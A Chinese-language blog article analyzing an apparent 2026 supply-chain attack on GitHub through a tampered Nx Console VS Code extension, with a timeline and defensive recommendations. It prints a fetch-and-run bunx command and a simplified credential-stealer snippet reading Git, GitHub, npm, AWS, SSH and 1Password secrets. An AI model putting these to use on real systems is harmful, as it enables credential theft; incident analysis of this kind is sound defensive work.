当前位置: 首页 > article >正文

18分钟攻破GitHub:TeamPCP供应链攻击全技术解析与防御新范式

摘要2026年5月18日威胁组织TeamPCP通过一条精心设计的多级供应链攻击链仅用18分钟就成功入侵全球最大代码托管平台GitHub的内部系统窃取了约3800个核心私有仓库涵盖Copilot、CodeQL、GitHub Actions等所有关键产品的源代码。本文将从技术角度深度拆解此次攻击的完整链条分析恶意代码的实现原理与攻击手法揭示当前软件供应链安全面临的系统性风险并提出一套覆盖开发终端、依赖管理、CI/CD流水线的全链路防御体系。一、事件背景与时间线2026年5月19日黑客组织TeamPCP在暗网Breached论坛发布重磅消息宣称已窃取GitHub约4000个内部私有仓库标价5万美元出售并威胁若无买家将在72小时内免费公开全部内容。帖子附带了仓库目录截图显示数据涉及GitHub Copilot、Enterprise Server、Red Team工具链等高度敏感项目。GitHub次日紧急确认事件真实性发布官方声明3800内部私有仓库遭未授权访问攻击源于一名员工设备上安装的恶意Nx Console VS Code扩展客户托管的代码与数据未受影响。这一事件震惊了整个科技界因为它标志着软件供应链攻击已经从普通开源项目升级到了全球最懂代码安全的公司本身。完整攻击时间线2026年3月-4月TeamPCP发起大规模供应链攻击先后入侵Trivy、Checkmarx KICS、LiteLLM、Mistral AI等知名项目5月15日TeamPCP通过TanStack供应链攻击窃取了Nx团队一名开发者的GitHub凭证5月18日12:30 UTC攻击者使用窃取的凭证向VS Code Marketplace发布恶意Nx Console扩展版本18.95.05月18日12:30-12:48 UTC恶意扩展在官方市场存活仅18分钟期间被包括GitHub员工在内的数千名开发者安装5月18日12:48 UTCNx团队发现异常并紧急下架恶意扩展5月19日TeamPCP在暗网公开叫卖GitHub源码5月20日GitHub官方确认事件开始轮换所有关键凭证5月21-22日安全研究人员陆续发布技术分析报告完整攻击链浮出水面二、攻击链深度技术拆解此次攻击采用了三级供应链级联攻击模式从上游开源项目入手逐步渗透到下游开发工具最终攻破目标企业的核心系统。整个攻击过程设计精妙几乎规避了所有传统安全检测手段。2.1 攻击链总览TeamPCP入侵TanStack项目窃取Nx开发者GitHub凭证发布恶意Nx Console扩展GitHub员工安装扩展下载SANDCLOCK窃取器窃取GitHub员工PAT访问内部Git系统下载3800核心仓库暗网出售数据2.2 第一阶段上游供应链投毒TanStack → Nx攻击的起点并非直接针对GitHub而是从一个更上游的开源项目TanStack开始。TeamPCP通过未知手段入侵了TanStack的代码仓库植入了恶意代码进而窃取了使用TanStack的Nx团队一名开发者的系统凭证。这是TeamPCP的典型攻击手法不直接攻击高价值目标而是先攻击其依赖的上游项目通过供应链级联效应逐步渗透。这种方式大大降低了攻击难度因为上游项目的安全防护往往不如最终目标严格。2.3 第二阶段开发工具污染Nx → Nx Console获得Nx开发者的GitHub凭证后TeamPCP立即采取了两个关键行动发布恶意VS Code扩展使用窃取的凭证向VS Code Marketplace发布了经过篡改的Nx Console扩展版本18.95.0。这个扩展在功能上与官方版本完全一致没有任何异常表现。植入孤儿提交在官方nrwl/nx GitHub仓库中攻击者推送了一个特殊的孤儿提交SHA: 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2。这个提交没有任何父提交无法从任何分支访问只能通过直接指定SHA来获取。GitHub UI不会显示这个提交因此很难被发现。孤儿提交的内容非常简单只有两个文件package.json声明了对Bun运行时的依赖index.js498KB的高度混淆JavaScript代码即SANDCLOCK凭证窃取器2.4 第三阶段终端入侵与数据窃取Nx Console → GitHub当GitHub员工安装并启动恶意Nx Console扩展时攻击进入了最关键的阶段。恶意扩展执行了一个看似无害的shell命令伪装成常规Nx Model Context Protocol设置任务# 恶意扩展执行的隐藏命令简化版bunx https://github.com/nrwl/nx/archive/558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.tar.gz这个命令从官方GitHub仓库下载了攻击者植入的孤儿提交对应的压缩包并使用Bun运行时执行其中的index.js文件。由于下载源是官方仓库且使用了HTTPS协议传统的防火墙和IDS系统完全无法检测到这是恶意流量。SANDCLOCK窃取器技术分析SANDCLOCK是TeamPCP专门开发的多阶段凭证窃取器具有以下技术特点多源凭证窃取能够从几乎所有常见的开发工具中提取敏感信息// SANDCLOCK窃取器核心逻辑反编译简化版conststealCredentialsasync(){constcredentials{};// 窃取Git凭证credentials.gitawaitreadFile(path.join(os.homedir(),.gitconfig));// 窃取GitHub PATcredentials.githubawaitexecCommand(gh auth token);// 窃取npm tokencredentials.npmawaitreadFile(path.join(os.homedir(),.npmrc));// 窃取AWS凭证credentials.awsawaitreadFile(path.join(os.homedir(),.aws,credentials));// 窃取SSH私钥credentials.sshawaitreadDirectory(path.join(os.homedir(),.ssh));// 窃取1Password CLI会话credentials.onepasswordawaitexecCommand(op session list);returncredentials;};多通道数据外逃为了确保数据能够成功传出SANDCLOCK使用了三个独立的外逃通道加密HTTPS请求到攻击者控制的C2服务器使用受害者自己的GitHub令牌通过GitHub API将数据上传到一个私有GistDNS隧道作为最后的备用通道持久化机制在macOS系统上SANDCLOCK会在/Users/%/.local/share/kitty/cat.py路径安装一个Python后门并添加到系统启动项中实现持久化访问。反检测技术采用了高度混淆的JavaScript代码包含字符串加密、控制流平坦化等反逆向技术。同时还会检测是否运行在虚拟机或沙箱环境中如果是则立即终止执行。18分钟突破核心防线从恶意扩展被安装到攻击者成功窃取3800仓库整个过程仅用了18分钟。这是因为VS Code扩展拥有过高权限默认情况下VS Code扩展可以读取本地所有文件、执行任意终端命令、访问网络、获取环境变量相当于拥有了开发者设备的完全控制权。GitHub员工凭证权限过大被窃取的个人访问令牌PAT拥有访问内部Git系统的权限且没有设置短有效期和IP限制。缺乏行为异常检测传统安全系统无法区分正常的Git克隆操作和攻击者的大规模数据窃取行为。三、影响范围与深度分析GitHub官方确认约3800个内部仓库被窃取这相当于GitHub内部代码库的约15%。虽然GitHub强调客户数据未受影响但这次泄露的影响远比表面上看起来要深远得多。3.1 核心产品源码泄露泄露的仓库涵盖了GitHub几乎所有核心产品的源代码GitHub CopilotAI编程助手的核心算法、模型训练代码、提示词工程GitHub Enterprise Server企业级部署架构、核心业务逻辑、权限管理系统CodeQL静态代码分析引擎的核心规则与实现GitHub ActionsCI/CD流水线的执行引擎与安全机制Red Team工具链内部安全攻防演练工具、渗透测试脚本安全系统漏洞管理系统、XSS防护补丁、入侵检测规则3.2 潜在安全风险这些源码的泄露可能带来以下长期安全风险0day漏洞挖掘攻击者可以深入分析GitHub的安全机制发现并利用未公开的0day漏洞进而攻击全球数百万使用GitHub的企业和开发者。供应链二次攻击攻击者可以利用泄露的Red Team工具和漏洞信息对其他企业发起更精准的攻击。产品竞争力下降GitHub的核心技术优势被竞争对手获取可能影响其在AI编程助手和企业DevOps市场的地位。信任危机作为全球最大的代码托管平台GitHub自身的安全防线被攻破严重动摇了开发者和企业对开源生态的信任。四、攻击者画像TeamPCP——供应链攻击的工业化先驱TeamPCP是2026年最活跃的威胁组织之一被Google威胁情报小组追踪为UNC6780疑似在东非运作以财务动机为主要目标。4.1 组织特点专注软件供应链攻击所有攻击都围绕软件供应链展开从不直接攻击企业服务器工业化攻击流程拥有标准化的攻击工具链和流程能够在短时间内发起大规模攻击高隐蔽性攻击手法极其隐蔽往往在攻击发生数周后才被发现精准打击高价值目标专门针对科技公司、开源项目和安全厂商发起攻击4.2 2026年攻击战绩3月入侵Aqua Security Trivy漏洞扫描器植入木马窃取CI/CD凭据4月攻击500NPM包和Python代理库篡改超1000个代码版本5月初攻破Mistral AI源码库窃取内部模型训练代码5月中旬入侵TanStack项目为后续攻击GitHub埋下伏笔5月18日攻破GitHub内部系统窃取3800核心仓库五、核心问题反思为什么全球最懂安全的公司也会中招GitHub作为全球最大的代码托管平台拥有世界顶级的安全团队和最先进的安全技术。然而它却被一个看似简单的VS Code扩展攻破了防线。这背后反映出当前企业安全防护体系存在的系统性漏洞。5.1 开发者终端成为最大的安全盲区传统企业安全防护体系主要关注边界防护防火墙、IDS和服务器安全而忽视了开发者终端的安全。然而在现代软件开发环境中开发者终端往往连接着公司的所有核心系统代码仓库、CI/CD流水线、云服务、数据库等。攻陷一个开发者终端就等于攻陷了整个公司。5.2 VS Code扩展权限设计的先天缺陷VS Code扩展的权限机制存在权限过大、粒度不足的根本性问题多数实用扩展默认申请文件系统完全访问、“网络无限制请求”、终端命令执行等高风险权限没有细粒度的权限控制开发者只能选择全部允许或不安装扩展运行在与VS Code主进程相同的权限级别没有有效的沙箱隔离5.3 官方安全的共识彻底崩塌此次攻击最令人震惊的一点是恶意扩展是通过官方VS Code Marketplace分发的恶意代码是从官方GitHub仓库下载的。这意味着即使开发者只信任官方渠道也无法避免被攻击。官方安全这个长期以来的共识已经被彻底打破。5.4 供应链安全防护的最后一公里缺失虽然越来越多的企业开始重视软件供应链安全但大多数企业的防护措施都停留在依赖漏洞扫描层面而忽视了开发工具和IDE扩展的安全。然而开发工具和IDE扩展恰恰是供应链攻击中最危险的环节因为它们拥有最高的权限和最广泛的信任。六、企业全链路防御体系建设针对TeamPCP这类供应链攻击组织传统的边界防护和杀毒软件已经完全失效。企业需要构建一套覆盖开发终端、依赖管理、CI/CD流水线的全链路防御体系。6.1 开发终端安全加固开发终端是供应链攻击的主要目标必须采取最严格的安全措施VS Code扩展白名单制度# 禁用VS Code自动更新扩展code --disable-extensions --install-extension ms-vscode.cpptools# 企业内部部署私有扩展市场# 只允许安装经过安全审计的扩展限制VS Code进程权限使用AppArmor或SELinux限制VS Code进程的文件访问范围禁止VS Code访问~/.ssh、~/.aws、~/.npmrc等敏感目录禁用VS Code的终端执行功能或使用沙箱隔离终端凭证安全管理禁止在本地存储明文凭证使用硬件安全密钥YubiKey所有PAT凭证设置短有效期最长24小时和最小权限范围敏感操作强制启用多因素认证MFA和设备绑定6.2 供应链风险管控依赖包安全管理# 禁用npm postinstall脚本这是最常见的恶意代码执行入口echoignore-scriptstrue~/.npmrc# 使用npm ci代替npm install确保依赖版本与lock文件一致npmci --ignore-scripts# 使用pnpm的严格依赖隔离模式pnpminstall--strict-peer-dependencies私有依赖镜像企业内部部署私有NPM、PyPI、Maven镜像仓库所有依赖包必须经过安全审计后才能同步到私有镜像禁止直接从公共仓库下载依赖依赖更新延迟策略配置Dependabot或Renovate设置依赖更新的最小发布年龄如72小时大多数供应链攻击会在发布后24小时内被发现和移除延迟更新可以有效规避风险6.3 CI/CD流水线安全采用SLSA框架至少达到SLSA Level 2确保构建制品的完整性和来源可追溯使用Sigstore Cosign对所有构建制品进行签名和验证生成并存储SBOM软件物料清单便于漏洞响应最小权限原则CI/CD流水线任务使用临时OIDC令牌而不是长期有效的密钥每个任务只授予完成其工作所需的最小权限禁止扫描工具拥有生产环境部署权限运行时防护使用eBPF技术监控CI/CD运行时的异常行为检测并阻止未经授权的网络连接和文件访问建立异常行为基线及时发现可疑活动6.4 安全工具链推荐安全阶段推荐工具主要用途依赖扫描Snyk、Socket.dev、Trivy检测依赖包中的漏洞和恶意代码制品签名Sigstore Cosign、Notary对构建制品进行签名和验证SBOM管理Syft、CycloneDX CLI生成和分析软件物料清单终端防护CrowdStrike、SentinelOne检测和阻止终端上的恶意活动运行时监控Falco、OpenRASP监控容器和应用的运行时行为供应链治理Anchore Enterprise、Scribe全链路供应链风险治理七、未来展望与趋势TeamPCP对GitHub的攻击标志着软件供应链攻击进入了一个新的阶段。未来供应链攻击将呈现以下趋势攻击目标上移从普通开源项目向开发工具、IDE、云服务等基础设施级目标转移攻击手法工业化攻击工具和流程将更加标准化和自动化攻击门槛进一步降低AI辅助攻击攻击者将利用AI技术加速漏洞挖掘、恶意代码生成和社会工程学攻击供应链级联攻击多级供应链攻击将成为主流通过上游项目渗透下游目标面对这些趋势企业必须转变安全理念从边界防护转向零信任架构从被动响应转向主动防御。只有构建起覆盖整个软件开发生命周期的全链路安全防护体系才能有效抵御日益复杂的供应链攻击。八、结语GitHub 3800仓库泄露事件给整个科技行业敲响了警钟。它告诉我们在软件定义一切的时代软件供应链安全已经成为企业安全的生命线。任何一个环节的疏忽都可能导致整个系统的崩溃。作为开发者我们需要提高安全意识谨慎使用第三方工具和扩展作为企业我们需要加大对供应链安全的投入建立完善的安全防护体系作为社区我们需要共同努力加强开源项目的安全治理保护整个开源生态的安全。只有这样我们才能在这个充满威胁的数字世界中构建起一道坚不可摧的安全防线。

相关文章:

18分钟攻破GitHub:TeamPCP供应链攻击全技术解析与防御新范式

摘要 2026年5月18日,威胁组织TeamPCP通过一条精心设计的多级供应链攻击链,仅用18分钟就成功入侵全球最大代码托管平台GitHub的内部系统,窃取了约3800个核心私有仓库,涵盖Copilot、CodeQL、GitHub Actions等所有关键产品的源代码。…...

3000+戴森球计划工厂蓝图终极指南:从新手到大师的完全解决方案

3000戴森球计划工厂蓝图终极指南:从新手到大师的完全解决方案 【免费下载链接】FactoryBluePrints 游戏戴森球计划的**工厂**蓝图仓库 项目地址: https://gitcode.com/GitHub_Trending/fa/FactoryBluePrints 还在为戴森球计划中复杂的工厂布局而头疼吗&#…...

Microsoft Defender双零日在野利用全解析:从BlueHammer到RedSun的终端沦陷之路

前言 2026年5月20日,微软安全响应中心(MSRC)发布紧急安全公告,承认旗下Microsoft Defender存在两个已被野外利用超过一个月的零日漏洞——CVE-2026-41091与CVE-2026-45498。同日,美国国土安全部下属的网络安全与基础设施安全局(CISA)将这两个…...

5步快速上手ScriptHookV:GTA V模组开发完整指南

5步快速上手ScriptHookV:GTA V模组开发完整指南 【免费下载链接】ScriptHookV An open source hook into GTAV for loading offline mods 项目地址: https://gitcode.com/gh_mirrors/sc/ScriptHookV ScriptHookV是一款专为《侠盗猎车手V》(GTA V&…...

矿山灾害应急回溯:UWB离线即失联,无感定位全程轨迹留存

矿山灾害应急回溯:UWB离线即失联,无感定位全程轨迹留存矿山井下塌方、瓦斯超限、透水、顶板垮落等突发性灾害具备极强不可预判性,灾害发生后极易伴随断电断网、通信中断、组网瘫痪等状况。应急轨迹回溯、人员位置核查、救援路线规划&#xff…...

AR眼镜主板与光机定制:从核心需求到量产落地的硬件开发指南

1. 项目概述:从一块主板到一副眼镜的蜕变最近几年,AR(增强现实)智能眼镜从科幻概念逐渐走进现实,无论是工业巡检、远程协作,还是消费娱乐,都能看到它的身影。但很多人可能不知道,决定…...

泉盛UV-K5/K6对讲机专业级固件定制与功能扩展指南

泉盛UV-K5/K6对讲机专业级固件定制与功能扩展指南 【免费下载链接】uv-k5-firmware-custom 全功能泉盛UV-K5/K6固件 Quansheng UV-K5/K6 Firmware 项目地址: https://gitcode.com/gh_mirrors/uvk5f/uv-k5-firmware-custom 泉盛UV-K5/K6对讲机LOSEHU固件是一款基于多个开…...

AR眼镜主板与光机定制开发:从核心需求到软硬件协同的工程实践

1. 项目概述:从“主板”与“光机”看AR眼镜的核心最近和几个做AR硬件和方案的朋友聊得比较多,大家普遍有个感觉:市面上关于AR眼镜的讨论,要么是概念满天飞,要么是成品评测,但真正深入到硬件底层&#xff0c…...

如何高效下载B站视频:Python开源工具bilibili-downloader完全指南

如何高效下载B站视频:Python开源工具bilibili-downloader完全指南 【免费下载链接】bilibili-downloader B站视频下载,支持下载大会员清晰度4K,持续更新中 项目地址: https://gitcode.com/gh_mirrors/bil/bilibili-downloader B站视频…...

DMXAPI:国产多模态大模型API聚合平台,让开发者一键调用通义千问等主流模型

在国产大模型百花齐放的今天,如何高效、稳定地接入各类模型能力,成为开发者和企业面临的核心痛点。DMXAPI 应运而生,作为中国多模态大模型API聚合平台,致力于打造"国产模型一站式调用中心",让开发者无需对接…...

大模型应用开发到底在开发什么?

你平时用 ChatGPT、Claude 或者各种 AI 助手的时候,可能觉得这玩意就是"发一句话、拿一个回答"。但你想过没有——那些企业里用的 AI 客服、智能答疑机器人,也是这么简单吗? 其实,大模型应用开发真正做的,不…...

Word到LaTeX的工业级转换:docx2tex深度解析与技术实践

Word到LaTeX的工业级转换:docx2tex深度解析与技术实践 【免费下载链接】docx2tex Converts Microsoft Word docx to LaTeX 项目地址: https://gitcode.com/gh_mirrors/do/docx2tex 在学术出版和技术文档领域,Word与LaTeX之间的格式鸿沟一直是困扰…...

AI赋能百业,从城市治理到智能家居,这些应用场景让你大开眼界!

文章深入探讨了人工智能在各个领域的创新应用,包括城市治理、医疗、金融、教育、交通出行、零售电商、制造、能源、农业、智能家居、娱乐传媒、文化旅游等。通过具体的案例和技术手段,展示了AI如何提升效率、优化决策、改善生活质量。例如,成…...

终极指南:BetterNCM插件管理器一键安装,让网易云音乐焕然新生

终极指南:BetterNCM插件管理器一键安装,让网易云音乐焕然新生 【免费下载链接】BetterNCM-Installer 一键安装 Better 系软件 项目地址: https://gitcode.com/gh_mirrors/be/BetterNCM-Installer 还在为网易云音乐功能单一而烦恼?Bett…...

AI大模型学习顺序_七步掌握大模型精髓:从入门到精通的进阶秘籍!

本文以“七层关系”为框架,系统地阐述了学习大模型的最佳路径。从基础概念入手,逐步深入到模型架构、训练技巧、应用场景等核心内容,旨在帮助读者构建完整的知识体系,最终实现从入门到精通的全面提升。按“七层关系”学大模型&…...

零基础构建智能语音助手:小智ESP32后端服务完全指南

零基础构建智能语音助手:小智ESP32后端服务完全指南 【免费下载链接】xiaozhi-esp32-server 本项目为xiaozhi-esp32提供后端服务,帮助您快速搭建ESP32设备控制服务器。Backend service for xiaozhi-esp32, helps you quickly build an ESP32 device cont…...

终极免费指南:如何用Wand-Enhancer深度解锁WeMod完整功能与远程控制

终极免费指南:如何用Wand-Enhancer深度解锁WeMod完整功能与远程控制 【免费下载链接】Wand-Enhancer Advanced UX and interoperability extension for Wand (WeMod) app 项目地址: https://gitcode.com/gh_mirrors/we/Wand-Enhancer Wand-Enhancer是一个开源…...

Insomnia终极指南:构建高效API测试与协作的完整工作流

Insomnia终极指南:构建高效API测试与协作的完整工作流 【免费下载链接】insomnia The open-source, cross-platform API client for GraphQL, REST, WebSockets, SSE and gRPC. With Cloud, Local and Git storage. 项目地址: https://gitcode.com/gh_mirrors/in/…...

如何快速实现浏览器隐身:puppeteer-extra-stealth的完整指南

如何快速实现浏览器隐身:puppeteer-extra-stealth的完整指南 【免费下载链接】puppeteer-extra 💯 Teach puppeteer new tricks through plugins. 项目地址: https://gitcode.com/gh_mirrors/pu/puppeteer-extra 你是否曾尝试使用Puppeteer进行网…...

WebPageTest:企业级分布式网页性能检测架构与优化实践

WebPageTest:企业级分布式网页性能检测架构与优化实践 【免费下载链接】WebPageTest Official repository for WebPageTest 项目地址: https://gitcode.com/gh_mirrors/we/WebPageTest WebPageTest作为全球领先的开源网页性能检测平台,为技术决策…...

Blender 3MF插件:开源3D打印数据交换的终极解决方案

Blender 3MF插件:开源3D打印数据交换的终极解决方案 【免费下载链接】Blender3mfFormat Blender add-on to import/export 3MF files 项目地址: https://gitcode.com/gh_mirrors/bl/Blender3mfFormat 在3D打印行业快速发展的今天,数据交换的完整性…...

2026电工杯数学建模竞赛B题思路分享

大家好呀,2026年电工杯数学建模竞赛今天早晨开赛啦,在这里先带来初步的选题建议及思路。 目前团队正在写B题完整论文,后续还会持续更新哈,大家三连关注一下防止迷路。以下只是简略的图文版初步思路,更详细的视频版完整…...

企业内如何规范 API Key 使用并实现访问控制与审计

🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 企业内如何规范 API Key 使用并实现访问控制与审计 在中大型企业或技术部门内部,大模型 API 的引入往往伴随着新的管理…...

3步掌握UI-TARS智能助手:从零开始实现桌面任务自动化

3步掌握UI-TARS智能助手:从零开始实现桌面任务自动化 【免费下载链接】UI-TARS-desktop The Open-Source Multimodal AI Agent Stack: Connecting Cutting-Edge AI Models and Agent Infra 项目地址: https://gitcode.com/GitHub_Trending/ui/UI-TARS-desktop …...

2026学生开发者指南:AI时代最值得掌握的10个Java+AI技能点

写在前面2026年的技术圈有个共识——AI Agent不是“会不会来”,而是“已经全面渗透”。但很多学生朋友问我:“我是Java背景,是不是必须转Python才能搞AI?”我的回答一直是:恰恰相反。当AI从“写脚本”走向“构建系统”…...

原来湖南2026年的灯光设计趋势竟然是这样的?

原来湖南2026年的灯光设计趋势竟然是这样的?随着科技的不断进步和人们生活水平的提高,灯光设计在家居和商业空间中的重要性日益凸显。湖南作为中部地区的经济大省,其灯光设计趋势也备受关注。本文将深入探讨2026年湖南灯光设计的主要趋势&…...

Ventoy解决方案:告别重复格式化的万能启动盘制作神器

Ventoy解决方案:告别重复格式化的万能启动盘制作神器 【免费下载链接】Ventoy A new bootable USB solution. 项目地址: https://gitcode.com/GitHub_Trending/ve/Ventoy Ventoy是一款革命性的开源可启动USB解决方案,通过创新的免格式化技术&…...

各种“地”—— 各种“GND”

GND,指的是电线接地端的简写。代表地线或0线。电路图上和电路板上的GND(Ground)代表地线或0线.GND就是公共端的意思,也可以说是地,但这个地并不是真正意义上的地。是出于应用而假设的一个地,对于电源来说,它就是一个电…...

工业视觉光源颜色选型全攻略|白/红/蓝/绿光适用场景、原理与避坑细则

摘要:在工业AI视觉缺陷检测项目落地中,绝大多数工程师过度聚焦相机参数、镜头焦距、模型调参优化,却忽略了光源颜色选型这一核心前置条件。工业检测有一条公认铁律:成像决定上限,模型只负责兜底。相同工件、相同光源结…...

Linux 服务器安装 CC Switch GUI 工具 + VNC 远程桌面完整教程

Linux 服务器安装 CC Switch GUI 工具 VNC 远程桌面完整教程 前言 CC Switch 是一款 All-in-One 的 AI 助手启动器,集成了 Claude Code、Codex 和 Gemini CLI 等工具。但它是 GTK 图形界面程序,在无桌面环境的 Linux 服务器上直接运行会报错&#xff…...